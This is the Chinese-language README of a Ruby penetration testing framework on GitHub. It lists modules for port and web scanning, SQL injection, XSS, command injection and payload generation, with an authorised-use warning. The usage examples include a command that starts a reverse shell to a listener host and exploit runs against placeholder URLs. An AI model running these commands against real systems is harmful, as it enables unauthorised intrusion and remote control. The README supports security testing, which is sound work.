Lanexus/cve-scanner
GitHub: Lanexus/cve-scanner
一款基于 Ruby 的渗透测试框架,集成端口扫描、Web 漏洞检测与多种漏洞利用模块,用于授权环境下的安全评估。
Stars: 0 | Forks: 0
# 渗透测试框架
**漏洞扫描器与漏洞利用框架**
基于 Ruby 构建的渗透测试框架。仅限在已获授权的安全环境中使用。
## 功能
- **Port Scanner** - 扫描端口并识别 service
- **Web Scanner** - 检测 Web application 中的漏洞
- **Directory Bruteforce** - 暴力破解目录与文件
- **Subdomain Enumerator** - 枚举子域名
- **SQL Injection** - 测试 SQL injection(error-based、blind、union、time-based)
- **XSS Scanner** - 检测 Cross-Site Scripting
- **Command Injection** - 测试命令注入
- **Payload Generator** - 为各种操作系统生成 payload
- **Report Generator** - 生成 text、JSON 或 HTML 格式的报告
## 安装
```
# Clone repository
git clone
# 进入目录
cd pentest-framework
# 运行 framework
ruby pentest --help
```
## 使用方法
### 基础用法
```
# Scan target
ruby pentest -t 192.168.1.1 -a scan
# 使用 web scanner 进行 Scan
ruby pentest -t 192.168.1.1 -a scan -m web
# 使用 file targets 进行 Scan
ruby pentest -f targets.txt -a scan -p 80,443,8080
# Generate report
ruby pentest -t 192.168.1.1 -a scan -o report.html -f html
```
### 进阶用法
```
# SQL Injection 测试
ruby pentest -t 192.168.1.1 -a exploit -m sqli --url "http://target.com/page.php"
# XSS 测试
ruby pentest -t 192.168.1.1 -a exploit -m xss --url "http://target.com/search"
# Command Injection 测试
ruby pentest -t 192.168.1.1 -a exploit -m cmdi --url "http://target.com/ping"
# Reverse Shell(用于测试)
ruby pentest -t 192.168.1.1 -a exploit -m reverseshell --lhost 10.0.0.1 --lport 4444
```
## 模块
### 扫描器
| 模块 | 描述 |
|--------|-------------|
| port | 带有 service 检测的端口扫描器 |
| web | Web application 扫描器 |
| banner | Banner grabbing |
| dirbrute | 目录暴力破解 |
| subdomain | 子域名枚举 |
### 漏洞利用
| 模块 | 描述 |
|--------|-------------|
| reverseshell | Reverse shell exploit |
| cmdi | 命令注入测试 |
| sqli | SQL injection 测试 |
| xss | XSS 漏洞扫描器 |
## 输出格式
- **text** - 纯文本报告
- **json** - JSON 格式
- **html** - 带样式的 HTML 报告
## 输出示例
```
[INFO] Starting port scan on 192.168.1.1...
[INFO] [port_open] 192.168.1.1 - Port 22 open (SSH)
[INFO] [port_open] 192.168.1.1 - Port 80 open (HTTP)
[INFO] [port_open] 192.168.1.1 - Port 443 open (HTTPS)
[HIGH] [vulnerability] 192.168.1.1 - Exposed .env file
[MEDIUM] [vulnerability] 192.168.1.1 - phpMyAdmin exposed
```
## 警告
本框架仅适用于:
- 已获授权的测试环境
- 合法且经授权的渗透测试
- 安全学习与研究
**未经授权的使用是非法的,并违反法律。**
## 许可证
MIT License - 用于安全教育和研究。
标签:CISA项目, Ruby, Web安全, 密码管理, 插件系统, 知识库, 蓝队分析